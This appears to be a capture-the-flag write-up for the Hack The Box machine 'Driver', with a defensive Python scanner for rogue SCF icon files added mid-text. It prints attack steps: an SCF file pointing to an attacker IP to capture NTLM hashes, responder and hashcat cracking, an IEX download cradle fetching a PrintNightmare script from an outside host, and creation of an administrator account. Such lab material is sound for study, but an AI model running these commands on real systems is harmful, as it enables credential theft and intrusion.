Enumeration

nmap -sC -sS -sV -F 10.10.11.106 >scan.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-16 13:34 EEST
Nmap scan report for 10.10.11.106 (10.10.11.106)
Host is up (0.084s latency).
Not shown: 97 filtered tcp ports (no-response)
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time:
|   date: 2021-10-16T17:34:49
|_  start_date: 2021-10-16T15:11:52
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.57 seconds

If we try to open the webpage, it requests a login. I just tried admin / admin and it worked…

After adding driver.htb to /etc/hosts, we can see Firmware Updates as the only working tab.

Getting the foothold

… firmware update to our file share. Our testing team will review the uploads manually and initiate the testing soon.

According to the text on the page, the file is being uploaded to an SMB share, where the team will review the uploads.

A Shell Command File (.scf) is processed by Explorer as soon as a user browses the folder containing it. If it specifies a remote path for the icon, Explorer will try to authenticate to that path with the user's credentials.

We upload the SCF as @zebra.scf (the @ prefix sorts the file to the top of the share listing) with the following content:

[Shell]
Command=2
IconFile=\\10.10.14.111\share\zebra.ico
[Taskbar]
Command=ToggleDesktop
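As an added defensive example (not part of the original writeup), this is the check the upload-reviewing team would want: a Python scanner that walks a share and flags .scf, .url and desktop.ini files whose icon key points to a UNC host outside an assumed allowlist. The sample share it builds is constructed data; its first entry mirrors the SCF shown above.

```python
import re
import tempfile
from pathlib import Path

ICON_SUFFIXES = {".scf", ".url"}    # Explorer reads an icon path from these
ICON_NAMES = {"desktop.ini"}        # as soon as the folder is merely listed
ICON_KEYS = {"iconfile", "iconresource"}       # compared case-insensitively
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")        # \\host\share\... -> host
ALLOWED_HOSTS = {"fileserver.corp.example"}    # assumed allowlist (constructed)


def icon_keys(text):
    """Yield (key, value) pairs from INI-style text; skip BOM, comments, headers."""
    for raw in text.splitlines():
        line = raw.lstrip("\ufeff").strip()
        if line and line[0] not in ";#[" and "=" in line:
            key, _, value = line.partition("=")
            yield key.strip().lower(), value.strip()

def remote_icon_host(path):
    """Host a UNC icon path points at, or None if the path is local/allowlisted."""
    for key, value in icon_keys(Path(path).read_text(errors="replace")):
        m = UNC_RE.match(value) if key in ICON_KEYS else None
        if m and m.group(1).lower() not in ALLOWED_HOSTS:
            return m.group(1)
    return None

def scan_share(root):
    """Walk an upload share; return sorted [(relative_path, host)] findings."""
    findings = []
    for p in Path(root).rglob("*"):
        if p.is_file() and (p.suffix.lower() in ICON_SUFFIXES or p.name.lower() in ICON_NAMES):
            host = remote_icon_host(p)
            if host:
                findings.append((str(p.relative_to(root)), host))
    return sorted(findings)

def demo_share():
    """Build a constructed sample share (not real data) and scan it."""
    root = tempfile.mkdtemp()
    samples = {  # first entry mirrors the SCF shown in the writeup
        "@zebra.scf": "[Shell]\nCommand=2\nIconFile=\\\\10.10.14.111\\share\\zebra.ico\n",
        "notes.scf": "[Shell]\nCommand=2\nIconFile=C:\\Windows\\explorer.exe,3\n",
        "intranet.url": "[InternetShortcut]\nIconFile=\\\\fileserver.corp.example\\i.ico\n",
        "firmware_v2.bin": "opaque upload, not parsed",
    }
    for name, body in samples.items():
        Path(root, name).write_text(body)
    return scan_share(root)
```

Only the writeup's SCF is reported; the local icon path and the allowlisted intranet shortcut pass, and non-INI uploads are never parsed.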

By using responder, we can grab the user hash:

responder -wrf --lm -v -I tun0

We get the following:

[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:...

To crack the NTLMv2 Hash, we can dump it to a file (hash.txt) and crack it using hashcat:

hashcat -m 5600 hash.txt /usr/share/dict/rockyou.txt -o cracked.txt

After getting the password, we might be able to log in. The shared folders in Samba don’t seem to be accessible. I couldn’t find anything for a while, so I decided to do a deeper port scan.

Port 5985 is open; nmap reports it as an HTTP service, but a quick search shows it is actually WinRM, the remote management service for Windows (similar to SSH). Using evil-winrm we can connect as the user with the cracked password.

evil-winrm -i 10.10.11.106 -u tony -p *****

Aaand we got the user flag!

Privilege escalation

The target has no Internet connection to download privilege escalation scripts, but we can serve them from a local HTTP server started in the folder that holds the tools:

python -m http.server -d ../Tools 8080

In the remote shell, we can download them with Invoke-WebRequest.

Invoke-WebRequest http://10.10.14.111:8080/winPEAS.bat -OutFile winpeas.bat

After scanning and not finding anything, I googled the vulnerabilities available for the current version. The most recent one is about the Print Spooler (PrintNightmare), which lets you escalate privileges easily.

To use the CVE exploit, I followed this blog post. In summary, you have to start an SMB service on your host, share a .dll that contains a reverse shell, call the Python exploit and wait for the shell to connect.

After those steps, we are running as SYSTEM:

C:\Windows\system32>whoami
nt authority\system

Then, we can get the root flag as usual by going to the Administrator’s desktop.

C:\Users\Administrator\Desktop>type root.txt
******************

To know more

First of all, I was lucky to hit the right one with the Print Spooler, but the correct way to check it was to run:

rpcdump.py @10.10.11.106 | grep MS-RPRN

The PrintNightmare exploit only works when the Print System Remote Protocol (MS-RPRN) is exposed.

That script gave us access to the Administrator account. However, it seems that it does not have many administrator rights (not enough to own the whole machine). Another way to perform the PrintNightmare exploit is by running the script locally from tony’s PS session.

By using the upload command we can upload our local copy of the exploit so that user tony can execute it. But the Execution Policy is restricted, so we are not able to run the script as usual. We have to bypass the Execution Policy (there are a lot of ways, but I chose a simple one) by using the IEX command.

python -m http.server 8001
IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.108:8001/CVE-2021-1675.ps1')

The IEX command automatically imports the module, so we can simply run:

Invoke-Nightmare -NewUser "zebra" -NewPassword "zebra1234"

Then connect as the new user with evil-winrm; this one will have full administrator rights.

References